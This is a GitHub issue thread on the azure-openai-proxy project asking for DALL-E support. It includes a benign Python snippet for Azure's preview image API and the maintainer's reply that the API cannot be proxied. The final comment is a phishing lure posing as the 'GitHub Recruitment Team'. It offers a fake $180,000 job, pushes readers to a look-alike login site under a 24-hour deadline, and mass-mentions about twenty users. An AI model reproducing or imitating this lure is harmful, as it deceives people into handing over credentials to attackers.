### ISSUE TITLE
Require support DALL-E model

### ISSUE THREAD

**Issue by shixinyu** [stulzq/azure-openai-proxy#36]
Greeting, Please consider add support DALL-E and in Azure OpenAI, the API route will be :
https://xxx.openai.azure.com/openai/images/generations:submit?api-version=2023-06-01-preview

**Comment by stulzq** [comment]
#22

**Comment by shixinyu** [comment]
`import requests
import time
import os
api_base = 'https://aceplaying.openai.azure.com/'
api_key = os.getenv("OPENAI_API_KEY")
api_version = '2023-06-01-preview'
url = "{}openai/images/generations:submit?api-version={}".format(api_base, api_version)
headers= { "api-key": api_key, "Content-Type": "application/json" }
body = {
    "prompt": "USER_PROMPT_GOES_HERE",
    "n": 2,
    "resolution": "1024x1024"
}
submission = requests.post(url, headers=headers, json=body)
operation_location = submission.headers['Operation-Location']
retry_after = submission.headers['Retry-after']
status = ""
while (status != "Succeeded"):
    time.sleep(int(retry_after))
    response = requests.get(operation_location, headers=headers)
    status = response.json()['status']
image_url = response.json()['result']['contentUrl']`

Just saw it from Azure Portal, does it help?

**Comment by stulzq** [comment]
This is not a valid API document, and I cannot rely on it to complete the task. I have studied the differences between OpenAI's DALLE API and Azure's preview API previously, and they are quite significant, making it impossible to act as a proxy.

**Comment by shixinyu** [comment]
Alright, thank you for your working.
Let's wait for MS release full DALLE API.

**Comment by rahuliyer95** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
diexdiersh, @mt-akar, @hazelnutcloud, @Woodsy1FD, @olibd, @ericgreenmix, @sobhanb-eth, @qcjxberin, @tysongibby, @aedvignette, @undertuga, @wcc19840827, @jmiehau, @faxonchris, @hindol, @RobAboud, @truemed, @winterdl, @J-DRD, @cc-chong
